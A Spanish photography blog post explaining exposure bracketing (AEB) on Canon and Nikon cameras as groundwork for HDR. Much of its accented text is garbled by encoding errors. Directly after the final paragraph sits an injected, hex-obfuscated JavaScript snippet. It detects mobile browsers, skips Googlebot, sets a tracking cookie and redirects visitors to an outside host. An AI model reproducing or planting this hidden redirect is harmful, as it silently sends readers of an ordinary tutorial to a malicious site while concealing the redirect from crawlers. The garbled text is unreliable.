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A?QuA� es el Bracketing? – Primer paso hacia el HDR

Antes de entrar a fondo en el tema de la fotografA�a HDR, del cual hablarA� en prA?ximos posts, es necesario dominar la tA�cnica del bracketing, puesto que a partir de ella se obtienen este tipo de fotografA�as. (Hay otras formas, pero no serA�an “HDR autA�nticas”, sino efectos simulados del mismo).

Lo primero que debemos hacer, siendo estricto, es diferenciar entre el bracketing y el autobracketing (AEB). Aunque por costumbre general se les llama a ambos igual, al que incorporan las cA?maras deberA�amos llamarlo autobracketing, ya que realmente es la cA?mara quien hace el proceso de horquillado por nosotros. El bracketing “tal cual” serA�a el realmente manual, es decir, el que realizamos cambiando nosotros mismos los parA?metros de 3 fotos, lo que implica tambiA�n puede hacerse de varios modos. Mientras que el automA?tico se centra A?nicamente en sumar o restar exposiciA?n (EV), el manual puede ser tambiA�n de profundidad de campo o de exposiciA?n de flash, aunque no son tan comunes y requieren conocimientos avanzados de fotografA�a. Por lo tanto, en este artA�culo nos centraremos en el autobracketing, que identificaremos mejor con las siglas AEB (Automatic Exposure Bracketing o “horquillado de exposiciA?n automA?tico”) en nuestra cA?mara.

El bracketing o “horquillado” en espaA�ol, es una tA�cnica que incorporan las cA?maras de nueva generaciA?n (prA?cticamente todas las reflex hoy en dA�a) y que sirve principalmente para obtener fotografA�as en HDR (High Dinamic Range o “Alto Rango DinA?mico). Se le llama asA� porque se parte de una foto base, bajo unos parA?metros que nosotros elegimos, a la que se le aA�aden un mA�nimo de otras 2 (una “por encima” y otra “por debajo”) hasta obtener una “horquilla” de fotos que posteriormente seleccionaremos, para el HDR en particular, intercalaremos.

Remarco la palabra mA�nimo, porque lejos de lo que se pueda creer (porque asA� viene generalmente estipulado), se puede crear una fotografA�a a partir de 5, 7 o 25 fotos mA?s para nuestra foto HDR definitiva. Eso sA�, debemos contar una pega, y es que solo podremos horquillar 3 fotos en cada proceso. Pero explicaremos este aspecto con mA?s detalle en otro post, asA� que veamos antes como trabajar en el modo bracketing.

CA?maras Canon:

Dentro del menA? principal, debemos buscar la opciA?n de ExposiciA?n compensada /AEB:

canon-aeb-setting

Y nos mostrarA? un cuadro como A�ste (60D y superiores) o parecido (inferiores a la gama XXD).

CA?maras Nikon:

 

nikon-backetingnikon-backeting-2

Tenemos la opciA?n dentro del menA? (Bracketing / Flash), o en la mayorA�a de modelos tambiA�n disponemos de un botA?n de acceso directo, situado al lado del botA?n “delete”, tal y como se muestra en la foto.

En ambas marcas el funcionamiento es similar: en el centro de la escala tenemos el punto 0, que representa la foto que nosotros configuramos para que sea la base de la horquilla. Debemos tener claro que A�sta foto tiene que ser la que nosotros consideremos como la “correctamente expuesta” (ni muy clara ni muy oscura), sin uso del flash. Los puntos a izquierda y derecha representan las fotos sub y sobreexpuesta. Por defecto, ambos puntos se muestran en la escala a un paso o “salto” del 0. Un paso de distancia significarA? pues, que las fotos sub y sobreexpuesta resultarA?n mA?s oscura y mA?s clara respectivamente que la original, pero no distarA?n en exceso de nuestra foto base. Es decir, que no se “exagera” el resultado ni por encima ni por debajo. Estos parA?metros son los que debemos usar si:

  • es nuestra primera experiencia en AEB

  • si no tenemos claro que intervalos aplicar

  • si las condiciones de luz son relativamente buenas

Por el contrario, si alejamos los puntos de las fotos complementarias estamos diciendo a nuestra cA?mara que queremos un horquillado exagerado y con muchos contrastes. Un horquillado exagerado nos supone un mayor rango de tonos, y por lo tanto, podemos jugar con un mayor margen a la hora de retocar la foto HDR. Pero como todo, tenemos ventajas e inconvenientes que se resumen en la siguiente premisa:

[highlight color=”yellow”]Cuanta mayor distancia entre las fotos horquilladas,A�mA?sA�rango dinA?mico,A�mA?sA�margen de retoque, peroA�menos real serA? la foto HDR que obtengamos.[/highlight]

Es decir, obtendremos una foto “surrealista” que por muy bonita que resulte, nos darA? la sensaciA?n de haber estado creada por ordenador. Por lo tanto, A?nicamente deberemos alejarnos del 0 en mA?s de 2 pasos si hacemos horquillados durante la noche o en condiciones de muy poca luz, y trabajar con las distancias por defecto (o alejarnos un paso como mucho) siempre que podamos.

Una vez tenemos configurados los mA?rgenes de horquillado para la fotografA�a que queremos tomar, debemos tener algo en cuenta: por defecto, el AVB nos prepara la cA?mara para tomar 2 fotos sucesivas despuA�s de la primera, asA� que tendremos que disparar 3 veces para completar el horquillado. Teniendo en cuenta que una de ellas aumentarA? la exposiciA?n de la cA?mara mediante el incremento del tiempo de exposiciA?n, es muy recomendable que activemos antes el temporizador de la cA?mara y la funciA?n de fotos en serie. A?PorquA�? Muy sencillo, porque el horquillado se basa en fotografA�as sobre un mismo plano sin modificar la focal ni la posiciA?n de la cA?mara, y el simple movimiento del disparador o de nuestro pulso durante la toma de las 3 fotos pueden hacer (perfectamente) que el horquillado no coincida en posiciA?n. Es decir, que si superponemos las 3 fotos no nos salgan idA�nticas. Esto restarA? muchA�sima calidad a la foto HDR y ademA?s nos supondrA? muchos problemas para editarla con el programa que sea (Photoshop por ejemplo), ya que esto se traduce en un efecto de desenfoque no deseado.

Pero que mejor que un ejemplo de primera mano para comprobar cA?mo funciona el horquillado, viA�ndolo sobre el terreno:

 

[one_third last=”no”]

backeting01
Foto subexpuesta (1/1000″)

[/one_third]

[one_third last=”no”]

backeting02
Foto base (1/500″)

[/one_third]

[one_third last=”yes”]

backeting03
Foto sobreexpuesta (1/250″)

[/one_third]

DespuA�s de disparar las 3 fotos obtuvimos los resultados de arriba.

Pese a que la foto correctamente expuesta es la del medio, debemos recordar que es la primera que realizamos en el proceso de horquillado, simplemente las he recolocado para que se vea mejor el efecto.

Como se ve, la de la izquierda esta subexpuesta, y por consiguiente, demasiado oscura, mientras que la de la derecha estA? sobreexpuesta o “quemada”. Estas dos fotos no tienen utilidad por si solas, ya que la exposiciA?n no es correcta, pero cuando entran en combinaciA?n las 3, los resultados son asombrosos.

En este ejemplo todas las fotos se tomaron con iguales parA?metros de posiciA?n, distancia focal (16 mm), abertura (f/3.5) e ISO (160), variando A?nicamente el tiempo de exposiciA?n (1/1000, 1/500 y 1/250 seg.)

El horquillado usado por la cA?mara fue el de un paso, y como vemos, se limitA? a dividir y multiplicar por dos respectivamente el tiempo de exposiciA?n.

Mostraremos los resultados posibles en HDR en prA?ximos posts. Si se tiene claro el concepto de bracketing, es mucho mA?s sencillo trabajar con HDR.var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Oscar Papiol

Acerca de Oscar Papiol

Aprendiz de fotógrafo y diseño gráfico autodidacta. Me centro en determinados tipos de fotografía, como las de larga exposición, deportiva, retratos y HDR. También he realizado reportajes de boda y sesiones de estudio. Colaborador de Fotored.es desde 2013. Estudiante de Comunicación Audiovisual. Soy un apasionado de los viajes, el cine y la música. En 2012 creé mi proyecto personal de comunicación (PMP Comunicació). Desde 2010 colaboro puntualmente como fotógrafo en la web deportiva www.kufuuza.com.

Publicado en Técnicas

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